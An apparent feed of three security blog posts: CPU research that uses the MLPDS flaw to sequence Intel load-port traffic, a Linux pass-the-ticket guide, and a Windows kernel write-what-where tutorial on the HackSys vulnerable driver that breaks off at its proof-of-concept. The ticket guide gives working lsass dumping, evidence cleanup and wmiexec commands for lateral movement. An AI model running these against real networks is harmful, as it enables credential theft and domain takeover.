This blog is fairly technical, and thus I highly recommend that you read my previous blog on Sushi Roll, my CPU research kernel where this technique was implemented. In the Sushi Roll blog I go a little bit more into the high-level details of Intel micro-architecture and it’s a great introduction to the topic if you’re not familiar.

YouTube video for PoC
implementation

Recording of the stream where we implemented this idea as a proof-of-concept. Click for the YouTube video!


Summary

We’re going to go into a unique technique for observing and sequencing all load port traffic on Intel processors. By using a CPU vulnerability from the MDS set of vulnerabilities, specifically multi-architectural load port data sampling (MLPDS, CVE-2018-12127), we are able to observe values which fly by on the load ports. Since (to my knowledge) all loads must end up going through load ports, regardless of requestor, origin, or caching, this means in theory, all contents of loads ever performed can be observed. By using a creative scanning technique we’re able to not only view “random” loads as they go by, but sequence loads to determine the ordering and timing of them.

We’ll go through some examples demonstrating that this technique can be used to view all loads as they are performed on a cycle-by-cycle basis. We’ll look into an interesting case of the micro-architecture updating accessed and dirty bits using a microcode assist. These are invisible loads dispatched on the CPU on behalf of the user when a page is accessed for the first time.

Why

As you may be familiar, x86 is quite a complex architecture with many nooks and crannies. As time has passed it has only gotten more complex, leading to fewer known behaviors of the inner workings. There are many instructions with complex microcode invocations which access memory, as was seen through my work on Sushi Roll. This made me curious as to what is actually going on with the load ports during some of these operations.

Intel CPU traffic during a normal
write

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during a traditional memory write

Intel CPU traffic during a write requiring dirty/accessed
updates

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during the same memory write as above, but this time where the page table entries need an accessed/dirty bit update

Beyond just directly invoked microcode due to instructions being executed, microcode also gets executed on the processor during “microcode assists”. These operations, while often undocumented, are referenced a few times throughout Intel manuals. Specifically in the Intel Optimization Manual there are references to microcode assists during accessed and dirty bit updates. Further, there is a restriction on TSX sections such that they may abort when accessed and dirty bits need to be updated. These microcode assists are fascinating to me, as while I have no evidence for it, I suspect they may be subject to different levels of permissions and validations compared to traditional operations. Whenever I see code executing on a processor as a side-effect to user operations, all I think is: “here be dragons”.


A playground for CPU bugs

When I start auditing a target, the first thing that I try to do is get introspection into what is going on. If the target is an obscure device then I’ll likely try to find some bug that allows me to image the entire device, and load it up in an emulator. If it’s some source code I have that is partial, then I’ll try to get some sort of mocking of the external calls it’s making and implement them as I come by them. Once I have the target running on my terms, and not the terms of some locked down device or environment, then I’ll start trying to learn as much about it as possible…

This is no different from what I did when I got into CPU research. Starting with when Meltdown and Spectre came out I started to be the go-to person for writing PoCs for CPU bugs. I developed a few custom OSes early on that were just designed to give a pass/fail indicator if a CPU bug were able to be exploited in a given environment. This was critical in helping test the mitigations that went in place for each CPU bug as they were reported, as testing if these mitigations worked is a surprisingly hard problem.

This led to me having some cleanly made OS-level CPU exploits written up. The custom OS proved to be a great way to test the mitigations, especially as the signal was much higher compared to a traditional OS. In fact, the signal was almost just a bit too strong…

When in a custom operating system it’s a lot easier to play around with weird behaviors of the CPU, without worrying about it affecting the system’s stability. I can easily turn off interrupts, overwrite exception handlers with specialized ones, change MSRs to weird CPU states, and so on. This led to me ending up with almost a playground for CPU vulnerability testing with some pretty standard primitives.

As the number of primitives I had grew, I was able to PoC out a new CPU bug in typically under a day. But then I had to wonder… what would happen if I tried to get as much information out of the processor as possible?


Sushi Roll

And that was the start of Sushi Roll, my CPU research kernel. I have a whole blog about the Sushi Roll research kernel, and I strongly recommend you read it! Effectively Sushi Roll is a custom kernel with message passing between cores rather than memory sharing. This means that each core has a complete copy of the kernel with no shared accesses. For attacks which need to observe the faintest signal in memory behaviors, this leads to a great amount of isolation.

When looking for a behavior you already understand on a processor, it’s pretty easy to get a signal. But when doing initial CPU research into unknowns and undefined behavior, getting that signal out takes every advantage you can get. Thus, in this low-noise CPU research environment, even the faintest leak causes a pretty large disruption in determinism, which is likely to show up as a measurable result earlier than traditional blind CPU research would allow.

Performance Counter Monitoring

In Sushi Roll I implemented a creative technique for monitoring the values in performance counters along with time-stamping them in cycles. Some of the performance counters in Intel processors count things like the number of micro-ops dispatched to each of the execution units on the core. Some of these counters increase during speculation, and with this data and time-stamping I was able to get some of the first-ever insights into what processor behavior was actually occurring during speculation!

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Being able to collect this sort of data immediately made unexpected CPU behaviors easier to catalog, measure, and eventually make deterministic. The more understanding we can get of the internals of the CPU, the better!


The Ultimate Goal

The ultimate goal of my CPU research is to understand so thoroughly how the Intel micro-architecture works that I can predict it with emulation models. This means that I would like to run code through an emulated environment and it would tell me exactly how many internal CPU resources would be used, which lines from caches and buffers would be evicted and what contents they would hold. There’s something beautiful to me to understanding something so well that you can predict how it will behave. And so the journey begins…

Past Progress

So far with the work in Sushi Roll we’ve been able to observe how the CPU dispatches uops during specific portions of code. This allows us to see which CPU resources are used to fulfill certain requests, and thus can provide us with a rough outline of what is happening. With simple CPU operations this is often all we need, as there are only so many ways to perform a certain operation, the complete picture can usually be drawn just from guessing “how they might have done it”. However, when more complex operations are involved, all of that goes out the window.

When reading through Intel manuals I saw many references to microcode assists. These are “situations” in your processor which may require microcode to be dispatched to execution units to perform some complex-ish logic. These are typically edge cases which don’t occur frequently enough for the processor to worry about handling them in hardware, rather just needing to detect them and cause some assist code to run. We know of one microcode assist which is relatively easy to trigger, updating the accessed and dirty bits in the page tables.

Accessed and dirty bits

In the Intel page tables (and honestly most other architectures) there’s a concept of accessed and dirty bits. These bits indicate whether or not a page has ever been translated (accessed), or has been written to (dirtied). On Intel it’s a little strange, as there is only a dirty bit on the final page table entry; however, accessed bits are present on each level of the page table during the walk. I’m quite familiar with these bits from my work with hypervisor-based fuzzing, as they allow high performance differential resetting of VMs by simply walking the page tables and restoring pages that were dirtied back to their original state from a snapshot.

But this leads to a curiosity… what is the mechanism responsible for setting these bits? Does the internal page table walker silicon set them during a page table walk? Are they set after the fact? Are they set atomically? Are they set during speculation or faulting loads?

From Intel manuals and some restrictions with TSX it’s pretty obvious that accessed and dirty bits are a bit of an anomaly. TSX regions will abort when memory is touched that does not have the respective accessed or dirty bits set. That is strange: why would this be a limitation of the processor?

TSX aborts during accessed and dirty bit
updates

Accessed and dirty bits causing TSX aborts from the Intel® 64 and IA-32 architectures optimization reference manual

… weird huh? Testing it out yields exactly what the manual says. If I write up some sample code which accesses memory which doesn’t have the respective accessed or dirty bits set, it aborts every time!

What’s next?

So now we have an ability to view what operation types are being performed on the processor. However this doesn’t tell us a huge amount of information. What we would really benefit from would be knowing the data contents that are being operated on. We can pretty easily log the data we are fetching in our own code, but that won’t give us access to the internal loads that happen as side effects on the processor, nor would it tell us about the contents of loads which happen during speculation.

Surely there’s no way to view all loads which happen on the processor right? Almost anything during speculation is a pain to observe, and even if we could observe the data it’d be quite noisy.

Or maybe there is a way…

… a way?

Fortunately there may indeed be a way! A while back I found a CPU vulnerability which allowed for random values to be sampled off of the load ports. While this vulnerability is initially thought to only allow for random values to be sampled from the load ports, perhaps we can get a bit more creative about leaking…


Multi-Architectural Load Port Data Sampling (MLPDS)

Multi-architectural load port data sampling sounds like an overly complex name, but it’s actually quite simple in the end. It’s a set of CPU flaws in Intel processors which allow a user to potentially get access to stale data recently transferred through load ports. This was actually a bug that I reported to Intel a while back; they ended up finding a few similar issues with different instruction combinations, and this is ultimately what comprises MLPDS.

MLPDS Intel Description

Description of MLPDS from Intel’s MDS DeepDive

The specific bug that I found was initially called “cache line split” or “cache line split load”, and it’s exactly what you might expect: a data access which straddles a cache line (a multi-byte load containing some bytes on one cache line and the remaining bytes on another). Cache lines are 64 bytes in size, so a multi-byte memory access which starts near the end of a line (for example at an address with the bottom 6 bits set) will cross into the next line and cause this behavior. These accesses must also cause a fault or an assist, but by using TSX it’s pretty easy to get whatever behavior you would like.
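
To make the straddling condition concrete, here is a small illustrative check (not part of the exploit itself):

CACHE_LINE = 64

def straddles_cache_line(addr, size):
    # Does an access of `size` bytes at `addr` cross a 64-byte boundary?
    return (addr % CACHE_LINE) + size > CACHE_LINE

print(straddles_cache_line(0x103f, 8))  # True: bottom 6 bits set, an 8-byte load splits across two lines
print(straddles_cache_line(0x1038, 8))  # False: the load fits entirely within one line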

This bug is largely an issue when hyper-threading is enabled as this allows a sibling thread to be executing protected/privileged code while another thread uses this attack to observe recently loaded data.

I found this bug when working on early PoCs of L1TF when we were assessing the impact it had. In my L1TF PoC (which was using random virtual addresses each attempt) I ended up disabling the page table modification. This ultimately is the root requirement for L1TF to work, and to my surprise, I was still seeing a signal. I initially thought it was some sort of CPU bug leaking registers as the value I was leaking was never actually read in my code. It turns out what I ended up observing was the hypervisor itself context switching my VM. What I was leaking was the contents of the registers as they were loaded during the context switch!

Unfortunately MLPDS has a really complex PoC…

mov rax, [-1]

After this instruction executes and it faults or aborts, the contents of rax during a small speculative window will potentially contain stale data from load ports. That’s all it takes!

From this point it’s just some trickery to get the 64-bit value leaked during the speculative window!


It’s all too random

Okay, so MLPDS allows us to sample a “random” value which was recently loaded on the load ports. This is a great start, as we can probably run this attack over and over and see what data is observed on a sample piece of code. Using hyper-threading for this attack is ideal because we can have one thread running some sample code in an infinite loop, while the other thread observes the values seen on the load ports.

An MLPDS exploit

Since there isn’t yet a public exploit for MLPDS, especially with the data rates we’re going to use here, I’m just going to go over the high-level details and not show how it’s implemented under the hood.

For this MLPDS exploit I use a couple different primitives. One is a pretty basic exploit which simply attempts to leak the raw contents of the value which was leaked. This value that we leak is always 64-bits, but we can chose to only leak a few of the bytes from it (or even bit-level granularity). There’s a performance increase for the fewer bytes that we leak as it decreases the number of cache lines we need to prime-and-probe each attempt.

There’s also another exploit type that I use that allows me to look for a specific value in memory, which turns the leak from a multi-byte leak to just a boolean “was value/wasn’t value”. This is the highest performance version due to how little information has to be leaked past the speculative window.

All of these leaks will leak a specific value from a single speculative run. For example, if we were to leak a 64-bit value, that 64-bit value will come from one MLPDS exploit and one speculative window. Getting an entire 64-bit value out during a single speculative window is a surprisingly hard problem, and I’m going to keep that as my own special sauce for a while. Compared to many public CPU leak exploits, this attack does not loop multiple times using masks to slowly reveal a value; it gets revealed from a single attempt. This is critical to us, as otherwise we wouldn’t be able to observe values which are loaded only once.

Here’s some of the leak rate numbers for the current version of MLPDS that I’m using:

Leak type Leaks/second
Known 64-bit value 5,979,278
8-bit any value 228,479
16-bit any value 116,023
24-bit any value 25,175
32-bit any value 13,726
40-bit any value 12,713
48-bit any value 10,297
56-bit any value 9,521
64-bit any value 8,234

It’s important to note that the known 64-bit value search is much faster than all of the others. We’ll make some good use of this later!

Test

Let’s try out a simple MLPDS attack on a small piece of code which loops forever fetching 2 values from memory.

mov  rax, 0x12345678f00dfeed
mov [0x1000], rax

mov  rax, 0x1337133713371337
mov [0x1008], rax

2:
    mov rax, [0x1000]
    mov rax, [0x1008]
    jmp 2b

This code should in theory just cause two loads: one of the value 0x12345678f00dfeed and another of the value 0x1337133713371337. Let’s spin this up on a hardware thread and have the sibling thread perform MLPDS in a loop! We’ll use our 64-bit any value MLPDS attack and simply histogram all of the different values we observe being leaked.

Sampling done:
    0x12345678f00dfeed : 100532
    0x1337133713371337 : 99217

Voila! Here we see the two different secret values on the attacking thread, at pretty much comparable frequencies.

Cool… so now we have a technique that allows us to see the contents of all loads on load ports, albeit only as random samples. Let’s take a look at the weird behavior during accessed bit updates by clearing the accessed bit on the final level page table entry every loop in the same code above.

Sampling done:
    0x0000000000000008 : 559
    0x0000000000000009 : 2316
    0x000000000000000a : 142
    0x000000000000000e : 251
    0x0000000000000010 : 825
    0x0000000000000100 : 19
    0x0000000000000200 : 3
    0x0000000000010006 : 438
    0x000000002cc8c000 : 3796
    0x000000002cc8c027 : 225
    0x000000002cc8d000 : 112
    0x000000002cc8d027 : 57
    0x000000002cc8e000 : 1
    0x000000002cc8e027 : 35
    0x00000000ffff8bc2 : 302
    0x00002da0ea6a5b78 : 1456
    0x00002da0ea6a5ba0 : 2034
    0x0000700dfeed0000 : 246
    0x0000700dfeed0008 : 5081
    0x0000930000000000 : 4097
    0x00209b0000000000 : 15101
    0x1337133713371337 : 2028
    0xfc91ee000008b7a6 : 677
    0xffff8bc2fc91b7c4 : 2658
    0xffff8bc2fc9209ed : 4565
    0xffff8bc2fc934019 : 2

Whoa! That’s a lot more values than we saw before. They aren’t just the two values we’re loading in a loop; there are many other values. Strangely the 0x1234... value is missing as well. Interesting. Well, since we know these are accessed bit updates, perhaps some of these are entries from the page table walk. Let’s look at the actual page table entries for the page we’re hitting.

CR3   0x630000
PML4E 0x2cc8e007
PDPE  0x2cc8d007
PDE   0x2cc8c007
PTE   0x13370003

Oh! How cool is that!? In the loads we’re leaking we see the raw page table entries with various versions of the accessed and dirty bits set! Here are the loads which stand out to me:

Leaked values:

    0x000000002cc8c000 : 3796                                                   
    0x000000002cc8c027 : 225                                                    
    0x000000002cc8d000 : 112                                                    
    0x000000002cc8d027 : 57                                                     
    0x000000002cc8e000 : 1                                                      
    0x000000002cc8e027 : 35 

Actual page table entries for the page we're accessing:

CR3   0x630000                                                                  
PML4E 0x2cc8e007                                                                
PDPE  0x2cc8d007                                                                
PDE   0x2cc8c007                                                                
PTE   0x13370003

The entries are being observed as 0x...27 as the 0x20 bit is the accessed bit for page table entries.
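
As a quick check (bit 5, value 0x20, is the accessed bit in an x86 paging-structure entry):

PTE_ACCESSED = 0x20               # bit 5 of an x86 page table entry is the accessed bit

pde = 0x2cc8c007                  # original page directory entry
print(hex(pde | PTE_ACCESSED))    # 0x2cc8c027, matching the leaked value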

Other notable entries are 0x0000930000000000 and 0x00209b0000000000 which look like the GDT entries for the code and data segments. 0x0000700dfeed0000 and 0x0000700dfeed0008 which are the 2 virtual addresses I’m accessing the un-accessed memory from. Who knows about the rest of the values? Probably some stack addresses in there…

So clearly, as we expected, the processor is dispatching uops which are performing a page table walk. Sadly we have no idea what the order of this walk is. Maybe we can find a creative technique for sequencing these loads…


Sequencing the Loads

Sequencing the loads that we are leaking with MLPDS is going to be critical to getting meaningful information. Without knowing the ordering of the loads, we simply know the contents of loads. Which is a pretty awesome amount of information, I’m definitely not complaining… but come on, it’s not perfect!

But perhaps we can limit the timing of our attack to a specific window, and infer ordering based on that. If we can find some trigger point where we can synchronize time between the attacker thread and the thread with secrets, we can vary the delay between this synchronization and the leak attempt. By scanning this delay we should hopefully get to see a cycle-by-cycle view of the observed values.

A trigger point

We can perform an MLPDS attack on a delay, however we need a reference point to delay from. I’ll steal the oscilloscope terminology of a trigger: a reference location to synchronize with. Similar to an oscilloscope, this trigger will synchronize us on the time domain each time we attempt a leak.

The easiest trigger we can use works only in an environment where we control both the leaking and secret threads, but in our case we have that control.

What we can do is simply have semaphores at each stage of the leak. We’ll have 2 hardware threads running with the following logic (a rough sketch follows the list):

  1. (Thread A running) (Thread B paused)
  2. (Thread A) Prepare to do a CPU attack, request thread B execute code
  3. (Thread A) Delay for a fixed amount of cycles with a spin loop
  4. (Thread B) Execute sample code
  5. (Thread A) At some “random” point during Thread B executing sample code, perform MLPDS attack to leak a value
  6. (Thread B) Complete sample code execution, wait for thread A to request another execution
  7. (Thread A) Log the observed value and the number of cycles in the delay loop
  8. goto 1 and do this many times until significant data is collected
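
Here is that measurement loop in rough Python pseudocode. The helpers run_sample_code, spin_cycles, and mlpds_leak are hypothetical stand-ins; in Sushi Roll these run on bare metal with cycle-accurate timing:

import threading, time, random

ATTEMPTS_PER_DELAY = 1000

# Hypothetical stand-ins for the bare-metal primitives
def run_sample_code():  pass                           # the code under test (thread B)
def spin_cycles(n):     time.sleep(n * 1e-9)           # stand-in for a fixed-cycle spin loop
def mlpds_leak():       return random.getrandbits(64)  # stand-in for the MLPDS leak primitive

go, done = threading.Event(), threading.Event()
results = []  # (delay, leaked_value) pairs

def thread_b():
    while True:
        go.wait(); go.clear()     # wait until thread A requests an execution
        run_sample_code()
        done.set()                # signal completion back to thread A

def thread_a(max_delay):
    for delay in range(max_delay):
        for _ in range(ATTEMPTS_PER_DELAY):
            go.set()              # trigger point: thread B begins the sample code
            spin_cycles(delay)    # fixed delay from the trigger
            results.append((delay, mlpds_leak()))
            done.wait(); done.clear()

threading.Thread(target=thread_b, daemon=True).start()
thread_a(max_delay=100)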

Uncontrolled target code

If needed, a trigger could be set on a “known value” at some point during execution if the target code is not controllable. For example, if you’re attacking a kernel, you could identify a magic value or known user pointer which gets accessed close to the code under test. An MLPDS attack can be performed until this magic value is seen, then a delay can start, and another attack can be used to leak a value. This allows uncontrolled target code to be sampled in a similar way. If the trigger “misses”, that’s fine; just try again in another loop.

Did it work?

So we put all of these things together, but does it actually work? Let’s try our 2 load example, and we’ll make the loads depend on each other to ensure they don’t get re-ordered by the processor.

Prep code:

core::ptr::write_volatile(vaddr as *mut u64, 0x12341337cafefeed);              
core::ptr::write_volatile((vaddr as *mut u64).offset(1), 0x1337133713371337);  

Test code:

let ptr = core::ptr::read_volatile(vaddr as *mut usize);
core::ptr::read_volatile((vaddr as usize + (ptr & 0x8)) as *mut usize);

In this code we set up 2 dependent loads: one which reads a value, and another which masks that value with 0x8 and uses the result as an offset for a subsequent access. Since the first value is a constant (0x12341337cafefeed & 0x8 == 8), we know that the second access will always land at offset 8; thus we expect to see a load of 0x1234... followed by 0x1337....

Graphing the data

To graph the data we have collected, we count how frequently each value was seen at every cycle offset. We’ll plot these with an x axis in cycles and a y axis of the frequency at which the value was observed at that cycle offset, then overlay the graphs for the different values we’ve seen. Let’s check it out in our simple case test code!

Sequenced leak example data

Here we also introduce a normal distribution best-fit for each value type, and a vertical line through the mean frequency-weighted value.

And look at that! We see the first access (in light blue) indicating that the value 0x12341337cafefeed was read, and slightly after we see (in orange) the value 0x1337133713371337 was read! Exactly what we would have expected. How cool is that!? There’s some other noise on here from the testing harness, but it’s pretty easy to ignore in this case.
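
For reference, the counting-and-overlay step is nothing fancy. A minimal matplotlib sketch, with a few made-up data points standing in for the collected (delay, value) pairs, might look like this:

from collections import Counter
import matplotlib.pyplot as plt

# (delay_in_cycles, leaked_value) pairs, e.g. collected by the harness sketched earlier
results = [(10, 0x12341337cafefeed), (11, 0x12341337cafefeed), (14, 0x1337133713371337)]

freqs = Counter(results)
for value in sorted({v for _, v in results}):
    xs = sorted({d for d, v in results if v == value})
    ys = [freqs[(d, value)] for d in xs]
    plt.plot(xs, ys, label=hex(value))

plt.xlabel("delay (cycles)")
plt.ylabel("frequency value observed")
plt.legend()
plt.show()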


A real-data case

Let’s put it all together and take a look at what a load looks like on pages which have not yet been marked as accessed.

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Hmmm, this is a bit too noisy. Let’s re-collect the data but this time only look at the page table entry values and the value contained on the page we’re accessing.

Here are the page table entries for the memory we’re accessing in our example:

CR3   0x630000
PML4E 0x2cc7c007
PDPE  0x2cc7b007
PDE   0x2cc7a007
PTE   0x13370003
Data  0x12341337cafefeed

We’re going to reset all page table entries to their non-dirty, non-accessed states, invalidate the TLB for the page via invlpg, and then read from the memory once. This will cause all accessed bits to be updated in the page tables! Here’s what we get…

Annotated ucode page walk Annotated ucode-assist page walk as observed with this technique

Here it’s hard to say why we see the 3rd and 4th levels of the page table get hit, as well as the page contents, prior to the accessed bit updates. Perhaps the processor tries the access first, and when it realizes the accessed bits are not set it goes through and sets them all. We can see fairly clearly that after the page data is read ~300 cycles in, the processor performs a walk through each level of the page tables. Presumably this is where the processor is reading the original values from the pages, oring in the accessed bit, and moving to the next level!


Speeding it up

So far, using our 64-bit MLPDS leak we can get about 8,000 leaks per second. This is a decent data rate, but when we want to sample data and draw statistical significance, more is always better. For each different value we want to log, and for each cycle count, we likely want about ~100 points of data. So let’s assume we want to sample 10 values over a 1000 cycle range; that means we’ll want about 1 million data points, which works out to roughly 2 minutes worth of runtime to collect this data.

Luckily, there’s a relatively simple technique we can use to speed up the data rates. Instead of using the full arbitrary 64-bit leak for the whole test, we can use the arbitrary leak early on to determine the values of interest. We just want to use the arbitrary leak for long enough to determine the values which we know are accessed during our test case.

Once we know the values we actually want to leak, we can switch to using our known-value leak which allows for about 6 million leaks per second. Since this can only look for one value at a time, we’ll also have to cycle through the values in our “known value” list, but the speedup is still worth it until the known value list gets incredibly large.

With this technique, collecting the 1 million data points for something with 5-6 values to sample only takes about a second. A speedup of two orders of magnitude! This is the technique that I’m currently using, although I have a fallback to arbitrary value mode if needed for some future use.
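
Roughly, the two-phase collection looks like the sketch below. The helpers arbitrary_leak_64, known_value_leak, and spin_from_trigger are hypothetical stand-ins for the non-public leak primitives and the trigger/delay logic:

import random
from collections import Counter

# Hypothetical stand-ins for the (non-public) leak primitives and trigger/delay logic
def arbitrary_leak_64():        return random.choice([0x12341337cafefeed, 0x1337133713371337])
def known_value_leak(value):    return random.random() < 0.5   # True if `value` was seen on a load port
def spin_from_trigger(cycles):  pass

# Phase 1: briefly run the slower arbitrary 64-bit leak to learn which values are in play
discovery = Counter(arbitrary_leak_64() for _ in range(10_000))
known_values = [v for v, _ in discovery.most_common(10)]

# Phase 2: sweep the delay, cycling through the known values with the much faster known-value leak
results = []
for delay in range(1000):
    for value in known_values:
        spin_from_trigger(delay)
        hits = sum(known_value_leak(value) for _ in range(100))
        results.append((delay, value, hits))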


Conclusion

We introduced an interesting technique for monitoring Intel load port traffic cycle-by-cycle and demonstrated that it can be used to get meaningful data to learn how Intel micro-architecture works. While there is much more for us to poke around in, this was a simple example to show this technique!

Future

There is so much more I want to do with this work. First of all, this will just be polished in my toolbox and used for future CPU research. It’ll just be a good go-to tool for when I need a little bit more introspection. But, I’m sure as time goes on I’ll come up with new interesting things to monitor. Getting logging of store-port activity would be useful such that we could see the other side of memory transactions.

As with anything I do, performance is always an opportunity for improvement. Getting a higher-fidelity MLPDS exploit, potentially with higher throughput, would always help make collecting data easier. I’ve also got some fun ideas for filtering this data to remove “deterministic noise”. Since we’re attacking from a sibling hyperthread I suspect we’d see some deterministic sliding and interleaving of core usage. If I could isolate these down and remove the noise that’d help a lot.

I hope you enjoyed this blog! See you next time!


Practical Guide to Passing Kerberos Tickets From Linux

21 November 2019 at 14:00

The goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or NT hash of a target user. Fear not: in many cases we can simply pass a Kerberos ticket in place of passing a hash.

This post is meant to be a practical guide. For a deeper understanding of the technical details and theory see the resources at the end of the post.

Tools

To get started we will first need to set up some tools. Each has setup information on its GitHub page.

Impacket

https://github.com/SecureAuthCorp/impacket

pypykatz

https://github.com/skelsec/pypykatz

Kerberos Client (optional)

RPM based: yum install krb5-workstation
Debian based: apt install krb5-user

procdump

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

autoProc.py (not required, but useful)

wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py

Lab Environment

This guide will use a simple Windows lab with two hosts:

dc01.winlab.com (domain controller)
client01.winlab.com (generic server)

And two domain accounts:

Administrator (domain admin)
User1 (local admin to client01)

Passing the Ticket

By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com.

image 1

A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz.

This can be done by uploading procdump64.exe to the target host:

image 2

And then run:

procdump64.exe -accepteula -ma lsass.exe output-file

image 3

Alternatively, we can use autoProc.py, which automates all of this and cleans up the evidence (if using this method, make sure you have placed procdump64.exe in /opt/procdump/; I also prefer to comment out line 107):

python3 autoProc.py domain/user@target

image 4

We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets:

pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp

image 5

And view the available tickets:

image 6

Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account!

The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host:

kirbi2ccache input.kirbi output.ccache

image 7

Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct (if optional Kerberos client was installed, klist is just used as a sanity check):

export KRB5CCNAME=/path/to/.ccache
klist

image 8

We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller:

wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn

image 9

Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires!

Conclusion

Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant.

Resources

https://www.tarlogic.com/en/blog/how-kerberos-works/

https://www.harmj0y.net/blog/tag/kerberos/

Thanks to the following for providing tools or knowledge:

Impacket

gentilkiwi

harmj0y

SkelSec

knavesec

Exploit Development: Windows Kernel Exploitation - Arbitrary Overwrites (Write-What-Where)

13 November 2019 at 00:00

Introduction

In a previous post, I talked about setting up a Windows kernel debugging environment. Today, I will be building on the foundation produced in that post. Again, we will be taking a look at the HackSysExtreme vulnerable driver. The HackSysExtreme team implemented a plethora of vulnerabilities here, based on the IOCTL code sent to the driver. The vulnerability we are going to take a look at today is what is known as an arbitrary overwrite.

At a very high level, what this means is that an adversary has the ability to write a piece of data (generally a shellcode) to a particular, controlled location. As you may recall from my previous post, the reason why we are able to obtain local administrative privileges (NT AUTHORITY\SYSTEM) is because we have the ability to do the following:

  1. Allocate a piece of memory in user land that contains our shellcode
  2. Execute said shellcode from the context of ring 0 in kernel land

Since the shellcode is executed in the context of ring 0, it runs with the highest privileges. And since our shellcode copies the NT AUTHORITY\SYSTEM token to a cmd.exe process, our shell will be an administrative shell.

Code Analysis

First let’s look at the ArbitraryWrite.h header file.

Take a look at the following snippet:

typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;
    PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

typedef in C, allows us to create our own data type. Just as char and int are data types, here we have defined our own data type.

Then, the WRITE_WHAT_WHERE line is an alias that can now be used to reference the struct _WRITE_WHAT_WHERE. Lastly, an aliased pointer type is created, called PWRITE_WHAT_WHERE.

Most importantly, we have a pointer called What and a pointer called Where. Essentially now, WRITE_WHAT_WHERE refers to this struct containing What and Where. PWRITE_WHAT_WHERE, when referenced, is a pointer to this struct.

Moving on down the header file, this is presented to us:

NTSTATUS
TriggerArbitraryWrite(
    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
);

Now, the parameter UserWriteWhatWhere has been declared with the data type PWRITE_WHAT_WHERE. As you can recall from above, PWRITE_WHAT_WHERE is a pointer to the struct that contains the What and Where pointers (which will be exploited later on). From now on, UserWriteWhatWhere also points to that struct.

Let’s move on to the source file, ArbitraryWrite.c.

The above function, TriggerArbitraryWrite(), is defined in the source file.

Then, the What and Where pointers declared earlier in the struct, are initialized as NULL pointers:

PULONG_PTR What = NULL;
PULONG_PTR Where = NULL;

Then finally, we reach our vulnerability:

#else
        DbgPrint("[+] Triggering Arbitrary Write\n");

        //
        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode
        //

        *(Where) = *(What);

As you can see, an adversary can write the value pointed to by What to the memory location pointed to by Where. The real issue is that there is no validation, using Windows API functions such as ProbeForRead() and ProbeForWrite(), to confirm whether the values pointed to by What and Where reside in user mode. Knowing this, we will be able to utilize our user mode shellcode going forward for the exploit.

IOCTL

As you may recall from the last blog, the IOCTL code that was used to interact with the HEVD vulnerable driver and take advantage of the TriggerStackOverflow() function occurred at this routine:

After tracing the IOCTL routine that jumps into the TriggerArbitraryOverwrite() function, here is what is displayed:

The above routine is part of a chain as displayed as below:

Now it's time to calculate the IOCTL code, which allows us to interact with the vulnerable routine. Essentially, look at the very first routine from above, which was utilized in my last blog post. The IOCTL code was 0x222003. (Notice how the value is only 6 digits, even though x86 uses 8 hex digits for a full 32-bit value: 0x222003 = 0x00222003.) The instruction sub eax, 0x222003 yields a value of zero, and the jz short loc_155FB (jump if zero) jumps into the TriggerStackOverflow() function. So, essentially using deductive reasoning, EAX contains a value of 0x222003 at the time the jump is taken.

Looking at the second and third routines in the image above:

sub eax, 4
jz short loc_155E3

and

sub eax, 4
jz short loc_155CB

Our goal is to successfully complete the “jump if zero” jump into the applicable vulnerability. In this case, the third routine shown above will lead us directly into TriggerArbitraryOverwrite() if the corresponding “jump if zero” jump is taken.

EAX starts out as our IOCTL code. The first routine subtracts 0x222003, and the next two routines each subtract 4 more, for a total of 8 beyond 0x222003. So let's try adding 8 to the IOCTL code from the last exploit, 0x222003. Adding 8 gives us a value of 0x22200B, or 0x0022200B as a legitimate x86 value. That means by the time execution reaches the last routine, EAX will have been reduced to zero, and the “jump if zero” into the TriggerArbitraryOverwrite() function will be taken!
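
As a quick sanity check of that arithmetic:

# IOCTL arithmetic: the first routine subtracts 0x222003, the next two subtract 4 each
STACK_OVERFLOW_IOCTL = 0x00222003
ARBITRARY_OVERWRITE_IOCTL = STACK_OVERFLOW_IOCTL + 0x8
print(hex(ARBITRARY_OVERWRITE_IOCTL))  # 0x22200b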

Proof Of Concept

Utilizing the newly calculated IOCTL, let’s create a POC:

import struct
import sys
import os
from ctypes import *
from subprocess import *
